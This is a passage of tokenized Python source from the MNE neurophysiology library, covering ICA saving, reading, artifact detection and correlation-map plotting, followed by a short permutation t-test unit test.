concatenate ( <EOL> ( sel_keep , range ( n_components , _n_pca_comp ) ) ) <EOL> proj_mat = np . dot ( mixing [ : , sel_keep ] , unmixing [ sel_keep , : ] ) <EOL> data = fast_dot ( proj_mat , data ) <EOL> if self . pca_mean_ is not None : <EOL> data += self . pca_mean_ [ : , None ] <EOL> if self . noise_cov is None : <EOL> data *= self . _pre_whitener <EOL> else : <EOL> data = fast_dot ( linalg . pinv ( self . _pre_whitener ) , data ) <EOL> return data <EOL> @ verbose <EOL> def save ( self , fname ) : <EOL> """<STR_LIT>""" <EOL> if self . current_fit == '<STR_LIT>' : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> check_fname ( fname , '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> logger . info ( '<STR_LIT>' % fname ) <EOL> fid = start_file ( fname ) <EOL> try : <EOL> _write_ica ( fid , self ) <EOL> except Exception : <EOL> os . remove ( fname ) <EOL> raise <EOL> end_file ( fid ) <EOL> return self <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return deepcopy ( self ) <EOL> def plot_components ( self , picks = None , ch_type = None , res = <NUM_LIT:64> , layout = None , <EOL> vmin = None , vmax = None , cmap = '<STR_LIT>' , sensors = True , <EOL> colorbar = False , title = None , show = True , outlines = '<STR_LIT>' , <EOL> contours = <NUM_LIT:6> , image_interp = '<STR_LIT>' , head_pos = None ) : <EOL> """<STR_LIT>""" <EOL> return plot_ica_components ( self , picks = picks , <EOL> ch_type = ch_type , <EOL> res = res , layout = layout , vmax = vmax , <EOL> cmap = cmap , <EOL> sensors = sensors , colorbar = colorbar , <EOL> title = title , show = show , <EOL> outlines = outlines , contours = contours , <EOL> image_interp = image_interp , <EOL> head_pos = head_pos ) <EOL> def plot_sources ( self , inst , picks = None , exclude = None , start = None , <EOL> stop = None , title = None , show = True , block = False ) : <EOL> """<STR_LIT>""" <EOL> return plot_ica_sources ( self , inst = inst , picks = picks , exclude = exclude , <EOL> title = title , start = 
start , stop = stop , show = show , <EOL> block = block ) <EOL> def plot_scores ( self , scores , exclude = None , labels = None , axhline = None , <EOL> title = '<STR_LIT>' , figsize = ( <NUM_LIT:12> , <NUM_LIT:6> ) , <EOL> show = True ) : <EOL> """<STR_LIT>""" <EOL> return plot_ica_scores ( <EOL> ica = self , scores = scores , exclude = exclude , labels = labels , <EOL> axhline = axhline , title = title , figsize = figsize , show = show ) <EOL> def plot_overlay ( self , inst , exclude = None , picks = None , start = None , <EOL> stop = None , title = None , show = True ) : <EOL> """<STR_LIT>""" <EOL> return plot_ica_overlay ( self , inst = inst , exclude = exclude , picks = picks , <EOL> start = start , stop = stop , title = title , show = show ) <EOL> def detect_artifacts ( self , raw , start_find = None , stop_find = None , <EOL> ecg_ch = None , ecg_score_func = '<STR_LIT>' , <EOL> ecg_criterion = <NUM_LIT:0.1> , eog_ch = None , <EOL> eog_score_func = '<STR_LIT>' , <EOL> eog_criterion = <NUM_LIT:0.1> , skew_criterion = - <NUM_LIT:1> , <EOL> kurt_criterion = - <NUM_LIT:1> , var_criterion = <NUM_LIT:0> , <EOL> add_nodes = None ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> _detect_artifacts ( self , raw = raw , start_find = start_find , <EOL> stop_find = stop_find , ecg_ch = ecg_ch , <EOL> ecg_score_func = ecg_score_func , <EOL> ecg_criterion = ecg_criterion , <EOL> eog_ch = eog_ch , eog_score_func = eog_score_func , <EOL> eog_criterion = eog_criterion , <EOL> skew_criterion = skew_criterion , <EOL> kurt_criterion = kurt_criterion , <EOL> var_criterion = var_criterion , <EOL> add_nodes = add_nodes ) <EOL> return self <EOL> @ verbose <EOL> def _check_n_pca_components ( self , _n_pca_comp , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( _n_pca_comp , float ) : <EOL> _n_pca_comp = ( ( self . pca_explained_variance_ / <EOL> self . pca_explained_variance_ . sum ( ) ) . cumsum ( ) <= <EOL> _n_pca_comp ) . sum ( ) <EOL> logger . 
info ( '<STR_LIT>' <EOL> '<STR_LIT>' % _n_pca_comp ) <EOL> elif _n_pca_comp is None : <EOL> _n_pca_comp = self . max_pca_components <EOL> elif _n_pca_comp < self . n_components_ : <EOL> _n_pca_comp = self . n_components_ <EOL> return _n_pca_comp <EOL> def _check_start_stop ( raw , start , stop ) : <EOL> """<STR_LIT>""" <EOL> return [ c if ( isinstance ( c , int ) or c is None ) else <EOL> raw . time_as_index ( c ) [ <NUM_LIT:0> ] for c in ( start , stop ) ] <EOL> @ verbose <EOL> def ica_find_ecg_events ( raw , ecg_source , event_id = <NUM_LIT> , <EOL> tstart = <NUM_LIT:0.0> , l_freq = <NUM_LIT:5> , h_freq = <NUM_LIT> , qrs_threshold = '<STR_LIT>' , <EOL> verbose = None ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> ecg_events = qrs_detector ( raw . info [ '<STR_LIT>' ] , ecg_source . ravel ( ) , <EOL> tstart = tstart , thresh_value = qrs_threshold , <EOL> l_freq = l_freq , h_freq = h_freq ) <EOL> n_events = len ( ecg_events ) <EOL> ecg_events = np . c_ [ ecg_events + raw . first_samp , np . zeros ( n_events ) , <EOL> event_id * np . ones ( n_events ) ] <EOL> return ecg_events <EOL> @ verbose <EOL> def ica_find_eog_events ( raw , eog_source = None , event_id = <NUM_LIT> , l_freq = <NUM_LIT:1> , <EOL> h_freq = <NUM_LIT:10> , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> eog_events = _find_eog_events ( eog_source [ np . newaxis ] , event_id = event_id , <EOL> l_freq = l_freq , h_freq = h_freq , <EOL> sampling_rate = raw . info [ '<STR_LIT>' ] , <EOL> first_samp = raw . first_samp ) <EOL> return eog_events <EOL> def _get_target_ch ( container , target ) : <EOL> """<STR_LIT>""" <EOL> picks = pick_channels ( container . ch_names , include = [ target ] ) <EOL> ref_picks = pick_types ( container . 
info , meg = False , eeg = False , ref_meg = True ) <EOL> if len ( ref_picks ) > <NUM_LIT:0> : <EOL> picks = list ( set ( picks ) - set ( ref_picks ) ) <EOL> if len ( picks ) == <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( target , container . ch_names ) ) <EOL> return picks <EOL> def _find_sources ( sources , target , score_func ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( score_func , string_types ) : <EOL> score_func = get_score_funcs ( ) . get ( score_func , score_func ) <EOL> if not callable ( score_func ) : <EOL> raise ValueError ( '<STR_LIT>' % score_func ) <EOL> scores = ( score_func ( sources , target ) if target is not None <EOL> else score_func ( sources , <NUM_LIT:1> ) ) <EOL> return scores <EOL> def _serialize ( dict_ , outer_sep = '<STR_LIT:;>' , inner_sep = '<STR_LIT::>' ) : <EOL> """<STR_LIT>""" <EOL> s = [ ] <EOL> for key , value in dict_ . items ( ) : <EOL> if callable ( value ) : <EOL> value = value . __name__ <EOL> elif isinstance ( value , int ) : <EOL> value = int ( value ) <EOL> elif isinstance ( value , dict ) : <EOL> for subkey , subvalue in value . items ( ) : <EOL> if isinstance ( subvalue , list ) : <EOL> if len ( subvalue ) > <NUM_LIT:0> : <EOL> if isinstance ( subvalue [ <NUM_LIT:0> ] , ( int , np . integer ) ) : <EOL> value [ subkey ] = [ int ( i ) for i in subvalue ] <EOL> for cls in ( np . random . RandomState , Covariance ) : <EOL> if isinstance ( value , cls ) : <EOL> value = cls . __name__ <EOL> s . append ( key + inner_sep + json . dumps ( value ) ) <EOL> return outer_sep . join ( s ) <EOL> def _deserialize ( str_ , outer_sep = '<STR_LIT:;>' , inner_sep = '<STR_LIT::>' ) : <EOL> """<STR_LIT>""" <EOL> out = { } <EOL> for mapping in str_ . split ( outer_sep ) : <EOL> k , v = mapping . split ( inner_sep , <NUM_LIT:1> ) <EOL> vv = json . 
loads ( v ) <EOL> out [ k ] = vv if not isinstance ( vv , text_type ) else str ( vv ) <EOL> return out <EOL> def _write_ica ( fid , ica ) : <EOL> """<STR_LIT>""" <EOL> ica_init = dict ( noise_cov = ica . noise_cov , <EOL> n_components = ica . n_components , <EOL> n_pca_components = ica . n_pca_components , <EOL> max_pca_components = ica . max_pca_components , <EOL> current_fit = ica . current_fit ) <EOL> if ica . info is not None : <EOL> start_block ( fid , FIFF . FIFFB_MEAS ) <EOL> write_id ( fid , FIFF . FIFF_BLOCK_ID ) <EOL> if ica . info [ '<STR_LIT>' ] is not None : <EOL> write_id ( fid , FIFF . FIFF_PARENT_BLOCK_ID , ica . info [ '<STR_LIT>' ] ) <EOL> write_meas_info ( fid , ica . info ) <EOL> end_block ( fid , FIFF . FIFFB_MEAS ) <EOL> start_block ( fid , FIFF . FIFFB_MNE_ICA ) <EOL> write_string ( fid , FIFF . FIFF_MNE_ICA_INTERFACE_PARAMS , <EOL> _serialize ( ica_init ) ) <EOL> if ica . ch_names is not None : <EOL> write_name_list ( fid , FIFF . FIFF_MNE_ROW_NAMES , ica . ch_names ) <EOL> n_samples = getattr ( ica , '<STR_LIT>' , None ) <EOL> ica_misc = { '<STR_LIT>' : ( None if n_samples is None else int ( n_samples ) ) , <EOL> '<STR_LIT>' : getattr ( ica , '<STR_LIT>' , None ) } <EOL> write_string ( fid , FIFF . FIFF_MNE_ICA_INTERFACE_PARAMS , <EOL> _serialize ( ica_init ) ) <EOL> write_string ( fid , FIFF . FIFF_MNE_ICA_MISC_PARAMS , <EOL> _serialize ( ica_misc ) ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_WHITENER , ica . _pre_whitener ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_PCA_COMPONENTS , <EOL> ica . pca_components_ ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_PCA_MEAN , ica . pca_mean_ ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_PCA_EXPLAINED_VAR , <EOL> ica . pca_explained_variance_ ) <EOL> write_double_matrix ( fid , FIFF . FIFF_MNE_ICA_MATRIX , ica . unmixing_matrix_ ) <EOL> write_int ( fid , FIFF . FIFF_MNE_ICA_BADS , ica . exclude ) <EOL> end_block ( fid , FIFF . 
FIFFB_MNE_ICA ) <EOL> @ verbose <EOL> def read_ica ( fname ) : <EOL> """<STR_LIT>""" <EOL> check_fname ( fname , '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> logger . info ( '<STR_LIT>' % fname ) <EOL> fid , tree , _ = fiff_open ( fname ) <EOL> try : <EOL> info , meas = read_meas_info ( fid , tree , clean_bads = True ) <EOL> except ValueError : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> info = None <EOL> else : <EOL> info [ '<STR_LIT:filename>' ] = fname <EOL> ica_data = dir_tree_find ( tree , FIFF . FIFFB_MNE_ICA ) <EOL> if len ( ica_data ) == <NUM_LIT:0> : <EOL> ica_data = dir_tree_find ( tree , <NUM_LIT> ) <EOL> if len ( ica_data ) == <NUM_LIT:0> : <EOL> fid . close ( ) <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> my_ica_data = ica_data [ <NUM_LIT:0> ] <EOL> for d in my_ica_data [ '<STR_LIT>' ] : <EOL> kind = d . kind <EOL> pos = d . pos <EOL> if kind == FIFF . FIFF_MNE_ICA_INTERFACE_PARAMS : <EOL> tag = read_tag ( fid , pos ) <EOL> ica_init = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ROW_NAMES : <EOL> tag = read_tag ( fid , pos ) <EOL> ch_names = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_WHITENER : <EOL> tag = read_tag ( fid , pos ) <EOL> pre_whitener = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_PCA_COMPONENTS : <EOL> tag = read_tag ( fid , pos ) <EOL> pca_components = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_PCA_EXPLAINED_VAR : <EOL> tag = read_tag ( fid , pos ) <EOL> pca_explained_variance = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_PCA_MEAN : <EOL> tag = read_tag ( fid , pos ) <EOL> pca_mean = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_MATRIX : <EOL> tag = read_tag ( fid , pos ) <EOL> unmixing_matrix = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_BADS : <EOL> tag = read_tag ( fid , pos ) <EOL> exclude = tag . data <EOL> elif kind == FIFF . FIFF_MNE_ICA_MISC_PARAMS : <EOL> tag = read_tag ( fid , pos ) <EOL> ica_misc = tag . data <EOL> fid . 
close ( ) <EOL> ica_init , ica_misc = [ _deserialize ( k ) for k in ( ica_init , ica_misc ) ] <EOL> current_fit = ica_init . pop ( '<STR_LIT>' ) <EOL> if ica_init [ '<STR_LIT>' ] == Covariance . __name__ : <EOL> logger . info ( '<STR_LIT>' ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> def f ( x ) : <EOL> return x . astype ( np . float64 ) <EOL> ica_init = dict ( ( k , v ) for k , v in ica_init . items ( ) <EOL> if k in _get_args ( ICA . __init__ ) ) <EOL> ica = ICA ( ** ica_init ) <EOL> ica . current_fit = current_fit <EOL> ica . ch_names = ch_names . split ( '<STR_LIT::>' ) <EOL> ica . _pre_whitener = f ( pre_whitener ) <EOL> ica . pca_mean_ = f ( pca_mean ) <EOL> ica . pca_components_ = f ( pca_components ) <EOL> ica . n_components_ = unmixing_matrix . shape [ <NUM_LIT:0> ] <EOL> ica . pca_explained_variance_ = f ( pca_explained_variance ) <EOL> ica . unmixing_matrix_ = f ( unmixing_matrix ) <EOL> ica . mixing_matrix_ = linalg . pinv ( ica . unmixing_matrix_ ) <EOL> ica . exclude = [ ] if exclude is None else list ( exclude ) <EOL> ica . info = info <EOL> if '<STR_LIT>' in ica_misc : <EOL> ica . n_samples_ = ica_misc [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in ica_misc : <EOL> ica . labels_ = ica_misc [ '<STR_LIT>' ] <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> return ica <EOL> _ica_node = namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def _detect_artifacts ( ica , raw , start_find , stop_find , ecg_ch , ecg_score_func , <EOL> ecg_criterion , eog_ch , eog_score_func , eog_criterion , <EOL> skew_criterion , kurt_criterion , var_criterion , <EOL> add_nodes ) : <EOL> """<STR_LIT>""" <EOL> from scipy import stats <EOL> nodes = [ ] <EOL> if ecg_ch is not None : <EOL> nodes += [ _ica_node ( '<STR_LIT>' , ecg_ch , ecg_score_func , ecg_criterion ) ] <EOL> if eog_ch not in [ None , [ ] ] : <EOL> if not isinstance ( eog_ch , list ) : <EOL> eog_ch = [ eog_ch ] <EOL> for idx , ch in enumerate ( eog_ch ) : <EOL> nodes += [ _ica_node ( '<STR_LIT>' % idx , ch , eog_score_func , <EOL> eog_criterion ) ] <EOL> if skew_criterion is not None : <EOL> nodes += [ _ica_node ( '<STR_LIT>' , None , stats . skew , skew_criterion ) ] <EOL> if kurt_criterion is not None : <EOL> nodes += [ _ica_node ( '<STR_LIT>' , None , stats . kurtosis , kurt_criterion ) ] <EOL> if var_criterion is not None : <EOL> nodes += [ _ica_node ( '<STR_LIT>' , None , np . var , var_criterion ) ] <EOL> if add_nodes is not None : <EOL> nodes . extend ( add_nodes ) <EOL> for node in nodes : <EOL> scores = ica . score_sources ( raw , start = start_find , stop = stop_find , <EOL> target = node . target , <EOL> score_func = node . score_func ) <EOL> if isinstance ( node . criterion , float ) : <EOL> found = list ( np . where ( np . abs ( scores ) > node . criterion ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> found = list ( np . atleast_1d ( abs ( scores ) . argsort ( ) [ node . criterion ] ) ) <EOL> case = ( len ( found ) , '<STR_LIT:s>' if len ( found ) > <NUM_LIT:1> else '<STR_LIT>' , node . name ) <EOL> logger . info ( '<STR_LIT>' % case ) <EOL> ica . exclude += found <EOL> logger . info ( '<STR_LIT>' + str ( ica . exclude ) . strip ( '<STR_LIT>' ) ) <EOL> if len ( set ( ica . exclude ) ) != len ( ica . exclude ) : <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> ica . exclude = list ( set ( ica . exclude ) ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> @ verbose <EOL> def run_ica ( raw , n_components , max_pca_components = <NUM_LIT:100> , <EOL> n_pca_components = <NUM_LIT:64> , noise_cov = None , random_state = None , <EOL> picks = None , start = None , stop = None , start_find = None , <EOL> stop_find = None , ecg_ch = None , ecg_score_func = '<STR_LIT>' , <EOL> ecg_criterion = <NUM_LIT:0.1> , eog_ch = None , eog_score_func = '<STR_LIT>' , <EOL> eog_criterion = <NUM_LIT:0.1> , skew_criterion = - <NUM_LIT:1> , kurt_criterion = - <NUM_LIT:1> , <EOL> var_criterion = <NUM_LIT:0> , add_nodes = None , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> ica = ICA ( n_components = n_components , max_pca_components = max_pca_components , <EOL> n_pca_components = n_pca_components , noise_cov = noise_cov , <EOL> random_state = random_state , verbose = verbose ) <EOL> ica . fit ( raw , start = start , stop = stop , picks = picks ) <EOL> logger . info ( '<STR_LIT:%s>' % ica ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> _detect_artifacts ( ica = ica , raw = raw , start_find = start_find , <EOL> stop_find = stop_find , ecg_ch = ecg_ch , <EOL> ecg_score_func = ecg_score_func , <EOL> ecg_criterion = ecg_criterion , eog_ch = eog_ch , <EOL> eog_score_func = eog_score_func , <EOL> eog_criterion = eog_criterion , <EOL> skew_criterion = skew_criterion , <EOL> kurt_criterion = kurt_criterion , <EOL> var_criterion = var_criterion , <EOL> add_nodes = add_nodes ) <EOL> return ica <EOL> @ verbose <EOL> def _band_pass_filter ( ica , sources , target , l_freq , h_freq , verbose = None ) : <EOL> if l_freq is not None and h_freq is not None : <EOL> logger . info ( '<STR_LIT>' ) <EOL> sources = band_pass_filter ( sources , ica . info [ '<STR_LIT>' ] , <EOL> l_freq , h_freq , method = '<STR_LIT>' , <EOL> verbose = verbose ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> target = band_pass_filter ( target , ica . 
info [ '<STR_LIT>' ] , <EOL> l_freq , h_freq , method = '<STR_LIT>' , <EOL> verbose = verbose ) <EOL> elif l_freq is not None or h_freq is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return sources , target <EOL> def _get_ica_map ( ica , components = None ) : <EOL> """<STR_LIT>""" <EOL> fast_dot = _get_fast_dot ( ) <EOL> if components is None : <EOL> components = list ( range ( ica . n_components_ ) ) <EOL> maps = fast_dot ( ica . mixing_matrix_ [ : , components ] . T , <EOL> ica . pca_components_ [ : ica . n_components_ ] ) <EOL> return maps <EOL> def _find_max_corrs ( all_maps , target , threshold ) : <EOL> """<STR_LIT>""" <EOL> all_corrs = [ compute_corr ( target , subj . T ) for subj in all_maps ] <EOL> abs_corrs = [ np . abs ( a ) for a in all_corrs ] <EOL> corr_polarities = [ np . sign ( a ) for a in all_corrs ] <EOL> if threshold <= <NUM_LIT:1> : <EOL> max_corrs = [ list ( np . nonzero ( s_corr > threshold ) [ <NUM_LIT:0> ] ) <EOL> for s_corr in abs_corrs ] <EOL> else : <EOL> max_corrs = [ list ( find_outliers ( s_corr , threshold = threshold ) ) <EOL> for s_corr in abs_corrs ] <EOL> am = [ l [ i ] for l , i_s in zip ( abs_corrs , max_corrs ) <EOL> for i in i_s ] <EOL> median_corr_with_target = np . median ( am ) if len ( am ) > <NUM_LIT:0> else <NUM_LIT:0> <EOL> polarities = [ l [ i ] for l , i_s in zip ( corr_polarities , max_corrs ) <EOL> for i in i_s ] <EOL> maxmaps = [ l [ i ] for l , i_s in zip ( all_maps , max_corrs ) <EOL> for i in i_s ] <EOL> if len ( maxmaps ) == <NUM_LIT:0> : <EOL> return [ ] , <NUM_LIT:0> , <NUM_LIT:0> , [ ] <EOL> newtarget = np . zeros ( maxmaps [ <NUM_LIT:0> ] . size ) <EOL> std_of_maps = np . std ( np . asarray ( maxmaps ) ) <EOL> mean_of_maps = np . std ( np . asarray ( maxmaps ) ) <EOL> for maxmap , polarity in zip ( maxmaps , polarities ) : <EOL> newtarget += ( maxmap / std_of_maps - mean_of_maps ) * polarity <EOL> newtarget /= len ( maxmaps ) <EOL> newtarget *= std_of_maps <EOL> sim_i_o = np . abs ( np . 
corrcoef ( target , newtarget ) [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> return newtarget , median_corr_with_target , sim_i_o , max_corrs <EOL> def _plot_corrmap ( data , subjs , indices , ch_type , ica , label , show , outlines , <EOL> layout , cmap , contours , template = True ) : <EOL> """<STR_LIT>""" <EOL> if not template : <EOL> title = '<STR_LIT>' <EOL> if label is not None : <EOL> title += '<STR_LIT>' + label <EOL> else : <EOL> title = "<STR_LIT>" <EOL> picks = list ( range ( len ( data ) ) ) <EOL> p = <NUM_LIT:20> <EOL> if len ( picks ) > p : <EOL> n_components = len ( picks ) <EOL> figs = [ _plot_corrmap ( data [ k : k + p ] , subjs [ k : k + p ] , <EOL> indices [ k : k + p ] , ch_type , ica , label , show , <EOL> outlines = outlines , layout = layout , cmap = cmap , <EOL> contours = contours ) <EOL> for k in range ( <NUM_LIT:0> , n_components , p ) ] <EOL> return figs <EOL> elif np . isscalar ( picks ) : <EOL> picks = [ picks ] <EOL> data_picks , pos , merge_grads , names , _ = _prepare_topo_plot ( <EOL> ica , ch_type , layout ) <EOL> pos , outlines = _check_outlines ( pos , outlines ) <EOL> data = np . atleast_2d ( data ) <EOL> data = data [ : , data_picks ] <EOL> fig , axes = _prepare_trellis ( len ( picks ) , max_col = <NUM_LIT:5> ) <EOL> fig . suptitle ( title ) <EOL> if merge_grads : <EOL> from . . channels . layout import _merge_grad_data <EOL> for ii , data_ , ax , subject , idx in zip ( picks , data , axes , subjs , indices ) : <EOL> if template : <EOL> ttl = '<STR_LIT>' . format ( subject , idx ) <EOL> ax . set_title ( ttl , fontsize = <NUM_LIT:12> ) <EOL> data_ = _merge_grad_data ( data_ ) if merge_grads else data_ <EOL> vmin_ , vmax_ = _setup_vmin_vmax ( data_ , None , None ) <EOL> plot_topomap ( data_ . 
flatten ( ) , pos , vmin = vmin_ , vmax = vmax_ , <EOL> res = <NUM_LIT:64> , axes = ax , cmap = cmap , outlines = outlines , <EOL> image_mask = None , contours = contours , show = False , <EOL> image_interp = '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> _hide_frame ( ax ) <EOL> tight_layout ( fig = fig ) <EOL> fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> fig . canvas . draw ( ) <EOL> plt_show ( show ) <EOL> return fig <EOL> @ verbose <EOL> def corrmap ( icas , template , threshold = "<STR_LIT>" , label = None , ch_type = "<STR_LIT>" , <EOL> plot = True , show = True , verbose = None , outlines = '<STR_LIT>' , layout = None , <EOL> sensors = True , contours = <NUM_LIT:6> , cmap = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( plot , bool ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if threshold == '<STR_LIT>' : <EOL> threshold = np . arange ( <NUM_LIT> , <NUM_LIT> , dtype = np . float64 ) / <NUM_LIT> <EOL> all_maps = [ _get_ica_map ( ica ) for ica in icas ] <EOL> if len ( template ) == <NUM_LIT:2> : <EOL> target = all_maps [ template [ <NUM_LIT:0> ] ] [ template [ <NUM_LIT:1> ] ] <EOL> is_subject = True <EOL> elif template . ndim == <NUM_LIT:1> and len ( template ) == all_maps [ <NUM_LIT:0> ] . shape [ <NUM_LIT:1> ] : <EOL> target = template <EOL> is_subject = False <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> template_fig , labelled_ics = None , None <EOL> if plot is True : <EOL> if is_subject : <EOL> ttl = '<STR_LIT>' . format ( str ( template [ <NUM_LIT:0> ] ) ) <EOL> template_fig = icas [ template [ <NUM_LIT:0> ] ] . plot_components ( <EOL> picks = template [ <NUM_LIT:1> ] , ch_type = ch_type , title = ttl , <EOL> outlines = outlines , cmap = cmap , contours = contours , layout = layout , <EOL> show = show ) <EOL> else : <EOL> template_fig = _plot_corrmap ( [ template ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , ch_type , <EOL> icas [ <NUM_LIT:0> ] . 
copy ( ) , "<STR_LIT>" , <EOL> outlines = outlines , cmap = cmap , <EOL> contours = contours , layout = layout , <EOL> show = show , template = True ) <EOL> template_fig . subplots_adjust ( top = <NUM_LIT> ) <EOL> template_fig . canvas . draw ( ) <EOL> if isinstance ( threshold , ( int , float ) ) : <EOL> if len ( all_maps ) == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return icas <EOL> nt , mt , s , mx = _find_max_corrs ( all_maps , target , threshold ) <EOL> elif len ( threshold ) > <NUM_LIT:1> : <EOL> paths = [ _find_max_corrs ( all_maps , target , t ) for t in threshold ] <EOL> nt , mt , s , mx = paths [ np . argmax ( [ path [ <NUM_LIT:2> ] for path in paths ] ) ] <EOL> if isinstance ( threshold , ( int , float ) ) : <EOL> if len ( all_maps ) == <NUM_LIT:0> or len ( nt ) == <NUM_LIT:0> : <EOL> if threshold > <NUM_LIT:1> : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return icas <EOL> nt , mt , s , mx = _find_max_corrs ( all_maps , nt , threshold ) <EOL> elif len ( threshold ) > <NUM_LIT:1> : <EOL> paths = [ _find_max_corrs ( all_maps , nt , t ) for t in threshold ] <EOL> nt , mt , s , mx = paths [ np . argmax ( [ path [ <NUM_LIT:1> ] for path in paths ] ) ] <EOL> allmaps , indices , subjs , nones = [ list ( ) for _ in range ( <NUM_LIT:4> ) ] <EOL> logger . info ( '<STR_LIT>' % mt ) <EOL> if plot is True : <EOL> logger . info ( '<STR_LIT>' ) <EOL> for ii , ( ica , max_corr ) in enumerate ( zip ( icas , mx ) ) : <EOL> if ( label is not None ) and ( not hasattr ( ica , '<STR_LIT>' ) ) : <EOL> ica . labels_ = dict ( ) <EOL> if len ( max_corr ) > <NUM_LIT:0> : <EOL> if isinstance ( max_corr [ <NUM_LIT:0> ] , np . ndarray ) : <EOL> max_corr = max_corr [ <NUM_LIT:0> ] <EOL> if label is not None : <EOL> ica . labels_ [ label ] = list ( set ( list ( max_corr ) + <EOL> ica . labels_ . get ( label , list ( ) ) ) ) <EOL> if plot is True : <EOL> allmaps . extend ( _get_ica_map ( ica , components = max_corr ) ) <EOL> subjs . 
extend ( [ ii ] * len ( max_corr ) ) <EOL> indices . extend ( max_corr ) <EOL> else : <EOL> if ( label is not None ) and ( label not in ica . labels_ ) : <EOL> ica . labels_ [ label ] = list ( ) <EOL> nones . append ( ii ) <EOL> if len ( nones ) == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' + <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ str ( x ) for x in nones ] ) + <EOL> '<STR_LIT>' ) <EOL> if plot is True : <EOL> labelled_ics = _plot_corrmap ( allmaps , subjs , indices , ch_type , ica , <EOL> label , outlines = outlines , cmap = cmap , <EOL> contours = contours , layout = layout , <EOL> show = show ) <EOL> return template_fig , labelled_ics <EOL> else : <EOL> return None </s>
<s> import numpy as np <EOL> from numpy . testing import assert_array_equal , assert_almost_equal <EOL> from scipy import stats <EOL> from mne . stats . permutations import permutation_t_test <EOL> def test_permutation_t_test ( ) : <EOL> """<STR_LIT>""" <EOL> np . random . seed ( <NUM_LIT:10> ) <EOL> n_samples , n_tests = <NUM_LIT:30> , <NUM_LIT:5> <EOL> X = np . random . randn ( n_samples , n_tests ) <EOL> X [ : , : <NUM_LIT:2> ] += <NUM_LIT:1> <EOL> T_obs , p_values , H0 = permutation_t_test ( X , n_permutations = <NUM_LIT> , tail = <NUM_LIT:0> ) <EOL> is_significant = p_values < <NUM_LIT> <EOL> assert_array_equal ( is_significant , [ True , True , False , False , False ] ) <EOL> T_obs , p_values , H0 = permutation_t_test ( X , n_permutations = <NUM_LIT> , tail = <NUM_LIT:1> ) <EOL> is_significant = p_values < <NUM_LIT> <EOL> assert_array_equal ( is_significant , [ True , True , False , False , False ] ) <EOL> T_obs , p_values , H0 = permutation_t_test ( X , n_permutations = <NUM_LIT> , tail = - <NUM_LIT:1> ) <EOL> is_significant = p_values < <NUM_LIT> <EOL> assert_array_equal ( is_significant , [ False , False , False , False , False ] ) <EOL> X = np . random . randn ( <NUM_LIT> , <NUM_LIT:1> ) <EOL> T_obs , p_values , H0 = permutation_t_test ( X [ : , [ <NUM_LIT:0> ] ] , n_permutations = '<STR_LIT:all>' ) <EOL> T_obs_scipy , p_values_scipy = stats . ttest_1samp ( X [ : , <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> assert_almost_equal ( T_obs [ <NUM_LIT:0> ] , T_obs_scipy , <NUM_LIT:8> ) <EOL> assert_almost_equal ( p_values [ <NUM_LIT:0> ] , p_values_scipy , <NUM_LIT:2> ) </s>
